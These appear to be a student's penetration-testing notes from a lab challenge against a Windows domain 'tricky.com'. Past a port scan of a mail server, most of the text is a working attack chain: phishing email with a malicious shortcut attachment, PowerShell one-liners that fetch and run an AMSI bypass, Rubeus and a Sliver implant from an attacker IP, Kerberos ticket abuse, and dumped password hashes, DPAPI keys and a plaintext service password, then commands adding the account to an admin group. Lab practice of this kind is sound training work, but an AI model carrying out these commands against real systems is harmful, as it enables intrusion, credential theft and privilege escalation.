IPs

  • 172.16.181.150

  • 192.168.181.100

  • 192.168.181.159

  • 172.16.181.151

  • 172.16.181.152

  • 172.16.181.155

In total there are 6 machines (IPs).

rustscan -a 192.168.181.100 192.168.181.169 --ulimit 5000 -- -Pn -sC -sV -oA challenge2

192.168.181.100

192.168.181.159 (MAIL01.tricky.com)

PORT      STATE SERVICE       REASON  VERSION
25/tcp    open  smtp          syn-ack hMailServer smtpd
| smtp-commands: mail01.tricky.com, SIZE 20480000, AUTH LOGIN, HELP
|_ 211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
80/tcp    open  http          syn-ack Microsoft IIS httpd 10.0
| http-methods:
|   Supported Methods: OPTIONS TRACE GET HEAD POST
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Tricky.com Mail system information
110/tcp   open  pop3          syn-ack hMailServer pop3d
|_pop3-capabilities: UIDL TOP USER
135/tcp   open  msrpc         syn-ack Microsoft Windows RPC
139/tcp   open  netbios-ssn   syn-ack Microsoft Windows netbios-ssn
143/tcp   open  imap          syn-ack hMailServer imapd
|_imap-capabilities: NAMESPACE QUOTA CAPABILITY ACL CHILDREN OK SORT completed IDLE IMAP4rev1 RIGHTS=texkA0001 IMAP4
445/tcp   open  microsoft-ds? syn-ack
587/tcp   open  smtp          syn-ack hMailServer smtpd
| smtp-commands: mail01.tricky.com, SIZE 20480000, AUTH LOGIN, HELP
|_ 211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
3389/tcp  open  ms-wbt-server syn-ack Microsoft Terminal Services
|_ssl-date: 2024-03-20T02:26:38+00:00; +1m25s from scanner time.
| rdp-ntlm-info:
|   Target_Name: TRICKY
|   NetBIOS_Domain_Name: TRICKY
|   NetBIOS_Computer_Name: MAIL01
|   DNS_Domain_Name: tricky.com
|   DNS_Computer_Name: mail01.tricky.com
|   DNS_Tree_Name: tricky.com
|   Product_Version: 10.0.17763
|_  System_Time: 2024-03-20T02:26:28+00:00
| ssl-cert: Subject: commonName=mail01.tricky.com
| Issuer: commonName=mail01.tricky.com
5985/tcp  open  http          syn-ack Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
49664/tcp open  msrpc         syn-ack Microsoft Windows RPC
49665/tcp open  msrpc         syn-ack Microsoft Windows RPC
49666/tcp open  msrpc         syn-ack Microsoft Windows RPC
49667/tcp open  msrpc         syn-ack Microsoft Windows RPC
49668/tcp open  msrpc         syn-ack Microsoft Windows RPC
49669/tcp open  msrpc         syn-ack Microsoft Windows RPC
49670/tcp open  msrpc         syn-ack Microsoft Windows RPC
49671/tcp open  msrpc         syn-ack Microsoft Windows RPC
49672/tcp open  msrpc         syn-ack Microsoft Windows RPC

Client-Side Execution

swaks --to Will@tricky.com --from bad@motherfucker.com --server 192.168.181.159 --header "Subject: Test Email" --body "This is a test email." --attach /home/jay/osep/windows_10_test/x.exe.lnk

Had to do it with a simple shell.

iex (new-object net.webclient).downloadstring("http://192.168.45.195/amsi"); iex (new-object net.webclient).downloadstring("http://192.168.45.195/rub.ps1");
Invoke-Rubeus -Command 'tgtdeleg /service:krbtgt /nowrap'
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
./rubeustoccache.py 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 will.kribi will.ccache
iex (new-object net.webclient).downloadstring("http://192.168.45.195/amsi"); (New-Object System.Net.WebClient).DownloadString('http://192.168.45.195:80/SliverPhollow64.txt') | IEX;
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe posh.csproj 
$ExecutionContext.SessionState.LanguageMode
$krb5tgs$23$*sqlsvc$tricky.com$MSSQLSvc/sql07.tricky.com:1433@tricky.com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
Administrator:500:aad3b435b51404eeaad3b435b51404ee:f263e421c6243b7fce36a145a5abd2c8
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:807e88817b41a28e6a46892728b03ce7
setup:1001:aad3b435b51404eeaad3b435b51404ee:85c14abd05f0e6107af13f55fddffdc3
[*] Cached domain logon information(domain/username:hash)
TRICKY.COM/Administrator:$DCC2$10240#Administrator#4b83a4ee0293e34203ec48a91fcb85af
TRICKY.COM/sqlsvc:$DCC2$10240#sqlsvc#c563b0d9b9e31f859baf10af22af0c62
[*] LSA Secrets
[*] $MACHINE.ACC
tricky.com\sql05$:aad3b435b51404eeaad3b435b51404ee:5ef8cb45f30726406d03d7cccaad3d17
[*] DPAPI_SYSTEM
dpapi_machinekey:07f5b837ebe9a982fc005f548146d3699cb436f3
dpapi_userkey:4d9a41c616478eb8729a95b416dd167b25fa964e
[*] NL$KM
NL$KM:c4b60d85beb8fdb70e205822acd2cd55439a37490a90dfe0e86846fea14e110207ee00a224c81ad41d1cede6fbd5e9f51f4bc6a90940ffc0a7fb1027fc74f1af
[*] _SC_MSSQL$SQLEXPRESS
sqlsvc@tricky.com:4dfgdfFFF542
---------------Script execution completed---------------
Add-DomainObjectAcl -TargetIdentity "MAILADMINS" -PrincipalIdentity sqlsvc -Domain tricky.com -Rights All -Verbose
Add-DomainGroupMember -Identity 'MAILADMINS' -Members 'sqlsvc'
Get-DomainGroupMember -Identity 'MAILADMINS'